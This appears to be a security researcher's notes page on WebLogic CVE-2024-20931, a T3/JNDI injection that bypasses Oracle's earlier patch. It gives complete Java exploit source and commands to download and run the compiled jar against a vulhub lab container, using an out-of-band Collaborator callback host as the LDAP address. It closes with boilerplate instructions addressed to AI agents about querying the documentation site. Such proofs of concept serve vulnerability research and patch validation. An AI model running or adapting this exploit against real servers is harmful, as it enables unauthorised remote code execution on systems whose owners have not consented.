# WebLogic - CVE-2024-20931

**CVE-2024-20931**, is built to <mark style="color:red;">**bypass the patch**</mark> Oracle made for CVE-2023-21839. In other words, this is just another T3/IIOP exploit of WebLogic.

Project is based on the findings of [GlassyAmadeus](https://github.com/GlassyAmadeus/CVE-2024-20931/tree/main).

## Proof-of-Concept

### VulnHub 12.2.1.3

```bash
apt :: ~ » docker container ls 
CONTAINER ID   IMAGE                      COMMAND                  CREATED      STATUS             PORTS                                                                                  NAMES
4c1bbd132119   vulhub/weblogic:12.2.1.3   "/u01/oracle/createA…"   2 days ago   Up About an hour   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   weblogic-vulnhub-12213
```

```bash
[oracle@weblogic-vulnhub-12213 exp]$ curl -OL https://github.com/0xPThree/WebLogic/raw/refs/heads/main/cve-2024-20931/CVE-2024-20931.jar
[oracle@weblogic-vulnhub-12213 exp]$ java -jar CVE-2024-20931.jar
Please input target IP:127.0.0.1
Please input target port:7001
Please input RMI Address(ip:port/exp):4diumyg78d3drm2y405khl71xs3jraky9.oastify.com
```

<figure><img src="/files/N5aWoMaCSsj9C8MSQGL6" alt=""><figcaption><p>Burp Collaborator callback indicating a successful exploit attempt</p></figcaption></figure>

## Source code

```java
// MainClass.java
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Scanner;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import weblogic.deployment.jms.ForeignOpaqueReference;

public class MainClass {
  public static void main(String[] args) throws NamingException, NoSuchFieldException, SecurityException, IllegalArgumentException, IllegalAccessException {
    String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    Scanner scanner = new Scanner(System.in);
    System.out.print("Please input target IP:");
    String tIp = scanner.nextLine();
    System.out.print("Please input target port:");
    String tPort = scanner.nextLine();
    String url = "t3://" + tIp + ":" + tPort;
    Hashtable<Object, Object> env1 = new Hashtable<>();
    env1.put("java.naming.factory.initial", JNDI_FACTORY);
    env1.put("java.naming.provider.url", url);
    InitialContext c = new InitialContext(env1);
    Hashtable<Object, Object> env2 = new Hashtable<>();
    System.out.print("Please input RMI Address(ip:port/exp):");
    String exp = scanner.nextLine();
    env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
    env2.put("datasource", "ldap://" + exp);
    ForeignOpaqueReference f = new ForeignOpaqueReference();
    Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
    jndiEnvironment.setAccessible(true);
    jndiEnvironment.set(f, env2);
    Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
    remoteJNDIName.setAccessible(true);
    String ldap = "ldap://" + exp;
    remoteJNDIName.set(f, ldap);
    c.rebind("glassy", f);
    try {
      c.lookup("glassy");
    } catch (Exception exception) {}
  }
}
```

```java
// META-INF/MANIFEST.MF
Manifest-Version: 1.0
Created-By: Maven JAR Plugin 3.3.0
Build-Jdk-Spec: 11
Main-Class: MainClass
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/oracle/weblogic-cve-2024-20931.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.